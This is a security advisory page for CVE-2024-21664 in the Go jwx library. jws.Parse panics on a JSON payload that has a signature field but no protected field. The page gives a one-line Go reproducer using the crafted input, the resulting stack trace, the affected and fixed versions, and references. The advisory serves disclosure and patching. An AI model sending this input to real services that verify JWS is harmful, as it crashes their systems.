Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So
Parsing JSON serialized payload without protected field can lead to segfault
Summary
Calling jws.Parse with a JSON serialized payload where the signature field is present while protected is absent can lead to a nil pointer dereference.
Details
This seems to also affect other functions that calls Parse internally, like jws.Verify.
My understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.
Based on the stack trace in the PoC, the issue seems to be that the processing done in jws/message.go:UnmarshalJSON() assumes that if a signature field is present, then a protected field is also present. If this is not the case, then the subsequent call to getB64Value(sig.protected) will dereference sig.protected, which is nil.
PoC
Reproducer:
package poc
import (
"testing"
"github.com/lestrrat-go/jwx/v2/jws"
)
func TestPOC(t *testing.T) {
_, _ = jws.Parse([]byte(`{"signature": ""}`))
}
Result:
$ go test
--- FAIL: TestPOC (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]
goroutine 6 [running]:
testing.tRunner.func1.2({0x628800, 0x831030})
/usr/local/go/src/testing/testing.go:1545 +0x238
testing.tRunner.func1()
/usr/local/go/src/testing/testing.go:1548 +0x397
panic({0x628800?, 0x831030?})
/usr/local/go/src/runtime/panic.go:914 +0x21f
github.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:484 +0x18
github.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/message.go:323 +0x4ad
encoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})
/usr/local/go/src/encoding/json/decode.go:604 +0x6cc
encoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})
/usr/local/go/src/encoding/json/decode.go:374 +0x3e
encoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})
/usr/local/go/src/encoding/json/decode.go:181 +0x133
encoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})
/usr/local/go/src/encoding/json/stream.go:73 +0x179
github.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/internal/json/json.go:26 +0x97
github.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:588 +0x50
github.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/[email protected]/jws/jws.go:525 +0x89
poc.TestPOC(0x0?)
/home/fredrik/src/jwx_poc/poc_test.go:10 +0x57
testing.tRunner(0xc0000e4340, 0x68ef30)
/usr/local/go/src/testing/testing.go:1595 +0xff
created by testing.(*T).Run in goroutine 1
/usr/local/go/src/testing/testing.go:1648 +0x3ad
exit status 2
FAIL poc 0.005s
Impact
The vulnerability can be used to crash / DOS a system doing JWS verification.
Permalink: https://github.com/advisories/GHSA-pvcr-v8j8-j5q3JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 4 months ago
Updated: 3 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
Identifiers: GHSA-pvcr-v8j8-j5q3, CVE-2024-21664
References:
- https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3
- https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f
- https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd
- https://nvd.nist.gov/vuln/detail/CVE-2024-21664
- https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65
- https://github.com/advisories/GHSA-pvcr-v8j8-j5q3
Blast Radius: 14.9
Affected Packages
go:github.com/lestrrat-go/jwx
Dependent packages: 1,295Dependent repositories: 2,884
Downloads:
Affected Version Ranges: >= 1.0.8, < 1.2.28
Fixed in: 1.2.28
All affected versions: 1.0.8, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15, 1.2.16, 1.2.17, 1.2.18, 1.2.19, 1.2.20, 1.2.21, 1.2.22, 1.2.23, 1.2.24, 1.2.25, 1.2.26, 1.2.27
All unaffected versions: 0.9.0, 0.9.1, 0.9.2, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.2.28
go:github.com/lestrrat-go/jwx/v2
Dependent packages: 439Dependent repositories: 301
Downloads:
Affected Version Ranges: < 2.0.19
Fixed in: 2.0.19
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17, 2.0.18
All unaffected versions: 2.0.19